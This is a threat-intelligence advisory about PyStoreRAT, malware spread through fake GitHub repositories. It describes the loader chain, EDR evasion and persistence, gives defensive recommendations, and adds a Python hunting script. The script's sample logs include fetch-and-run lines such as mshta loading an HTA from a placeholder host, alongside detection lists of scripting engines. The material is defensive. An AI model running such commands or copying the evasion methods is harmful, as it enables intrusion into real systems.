Current Cyber Threats

Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

Summary:
PyStoreRAT is an undocumented, multi-stage JavaScript Remote Access Trojan (RAT) primarily delivered through malicious GitHub repositories. These repositories are meticulously crafted to appear legitimate, featuring professional README files, AI-generated graphics, and inflated engagement metrics like stars and forks to deceive developers and OSINT practitioners. The infection begins when a user executes a lightweight Python or JavaScript loader stub embedded in these repositories. This loader silently initiates a connection to a Command and Control (C2) server, which validates the request's User-Agent before delivering an HTA file. This HTA file, executed via mshta[.]exe, contains the primary PyStoreRAT engine, which operates filelessly in memory to avoid static detection.

Once active, PyStoreRAT conducts extensive system profiling, collecting data such as host identity, OS telemetry, and security posture, while specifically checking for administrative and SYSTEM privileges. The RAT is highly modular and utilizes a structured two-stage handshake for C2 communication, requiring a unique session token to authorize task retrieval. It features a robust tasking system (Task IDs 1–11) capable of diverse operations, including downloading and executing EXE and DLL payloads, performing forensic cleanup, executing fileless PowerShell, and propagating via USB worming by replacing legitimate documents with malicious shortcuts. In several observed cases, the RAT has been used to deploy the Rhadamanthys infostealer as a final payload.


Security Officer Comments:
The development of PyStoreRAT indicates a high degree of operational maturity and a focus on bypassing modern defensive stacks. A standout feature is its targeted evasion logic against CrowdStrike Falcon: the malware queries the system for the csfalconservice process and, if detected, attempts to break the process tree by launching subsequent stages through a cmd[.]exe wrapper. To further avoid EDR detection, the authors implemented a custom string manipulation engine that manually deserializes C2 commands, bypassing the hooks typically placed on standard sinks like eval(). The inclusion of Russian-language artifacts (the malware specifically checks for "SYSTEM" privileges using the Cyrillic spelling) suggests the threat actors likely originate from Eastern Europe. Its persistence mechanism, which disguises itself as a frequently running "NVIDIA App SelfUpdate" scheduled task, underscores its intent for long-term access.


Suggested Corrections:
  • Restrict Scripting Engines: Organizations should implement policies to block or strictly monitor the execution of mshta[.]exe and wscript[.]exe, as these are the primary vehicles for the RAT's fileless execution.
  • GitHub and Open-Source Governance: Security teams should treat third-party GitHub repositories with caution, especially those promoted via social media with high star counts but limited functional history.
  • Monitor Scheduled Tasks: Regularly audit system scheduled tasks for unusual entries, particularly those mimicking legitimate software updates that are configured to run at high frequencies like every 10 minutes.
  • Endpoint Detection (EDR) Hardening: Configure EDR tools to alert on suspicious parent-child relationships, such as Python or Node.js processes spawning mshta[.]exe or cmd[.]exe wrappers used for process-tree breaking.
  • Protect Financial Artifacts: Given the malware's explicit scanning for cryptocurrency wallet files, sensitive financial data should be stored in encrypted volumes or hardware-secured environments.
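The following is an added example, not code from the advisory or from either linked report, showing how the scheduled-task and parent-child recommendations above can be turned into a concrete hunting pass. It assumes a simple key=value process-creation log format (in practice the same fields come from Sysmon Event ID 1 or Windows Security event 4688) and a list of scheduled-task entries as you would export them from an inventory tool; every event line, task name interval and path below is constructed sample data, not a real indicator.

```python
"""
Added detection example (not from the advisory): flags (1) script interpreters
(Python/Node.js) spawning mshta.exe, cmd.exe or wscript.exe, and (2) scheduled
tasks that run a scripting engine at high frequency (e.g. every 10 minutes).
The log format and all sample values are constructed for this example.
"""
import re

# Interpreters the advisory names as loaders, and the LOLBins they were seen spawning.
SCRIPT_PARENTS = {"python.exe", "pythonw.exe", "node.exe"}
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "wscript.exe"}
# Scripting engines that should rarely be the action of a recurring scheduled task.
SCRIPT_ENGINES = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
HIGH_FREQUENCY_MINUTES = 10  # the advisory's "every 10 minutes" threshold

# key=value pairs; values may be double-quoted to allow spaces in paths/cmdlines.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# First token of a task action: either a quoted path or a run of non-space chars.
ACTION_EXE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')

# Constructed process-creation events (assumed format, not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    r'ts=2025-12-01T10:00:01Z parent=C:\Python312\python.exe child=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://example.invalid/stage.hta"',
    r'ts=2025-12-01T10:00:02Z parent="C:\Program Files\nodejs\node.exe" child=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c mshta.exe http://example.invalid/stage.hta"',
    r'ts=2025-12-01T10:00:03Z parent=C:\Windows\explorer.exe child=C:\Windows\System32\cmd.exe cmdline="cmd.exe"',
    r'ts=2025-12-01T10:00:04Z parent=C:\Python312\python.exe child=C:\Python312\python.exe cmdline="python.exe worker.py"',
    r'ts=2025-12-01T10:00:05Z parent=C:\Python312\pythonw.exe child=C:\Windows\System32\wscript.exe cmdline="wscript.exe //B loader.js"',
]

# Constructed scheduled-task inventory (names/paths are illustrative only).
SAMPLE_TASKS = [
    {"name": "NVIDIA App SelfUpdate", "interval_minutes": 10,
     "action": r'C:\Windows\System32\mshta.exe C:\Users\Public\update.hta'},
    {"name": "Vendor Updater", "interval_minutes": 1440,
     "action": r'"C:\Program Files\Vendor\Updater.exe" --check'},
    {"name": "Log rotate", "interval_minutes": 5,
     "action": r'C:\Windows\System32\cmd.exe /c del C:\logs\*.old'},
]


def parse_event(line):
    """Parse one key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def action_executable(action):
    """Lower-cased executable name from a scheduled-task action string."""
    m = ACTION_EXE_RE.match(action or "")
    if not m:
        return ""
    return basename(m.group(1) or m.group(2))


def flag_process_events(lines):
    """Return events where a script interpreter spawns a suspicious child."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        parent = basename(ev.get("parent", ""))
        child = basename(ev.get("child", ""))
        if parent in SCRIPT_PARENTS and child in SUSPICIOUS_CHILDREN:
            hits.append({"ts": ev.get("ts"), "parent": parent,
                         "child": child, "cmdline": ev.get("cmdline", "")})
    return hits


def flag_scheduled_tasks(tasks, max_minutes=HIGH_FREQUENCY_MINUTES):
    """Return names of tasks running a scripting engine at high frequency."""
    return [t["name"] for t in tasks
            if t["interval_minutes"] <= max_minutes
            and action_executable(t["action"]) in SCRIPT_ENGINES]


if __name__ == "__main__":
    for hit in flag_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[proc] {hit['ts']} {hit['parent']} -> {hit['child']}: {hit['cmdline']}")
    for name in flag_scheduled_tasks(SAMPLE_TASKS):
        print(f"[task] high-frequency scripting-engine task: {name}")
```

The task check deliberately leaves cmd.exe out of SCRIPT_ENGINES, since short-interval cmd.exe maintenance tasks are common and would drown the alert; the process check keeps cmd.exe as a child because the advisory's point is the interpreter-to-wrapper relationship, not cmd.exe on its own.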

Link(s):
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://www.morphisec.com/blog/pyst...re-campaign-targeting-it-osint-professionals/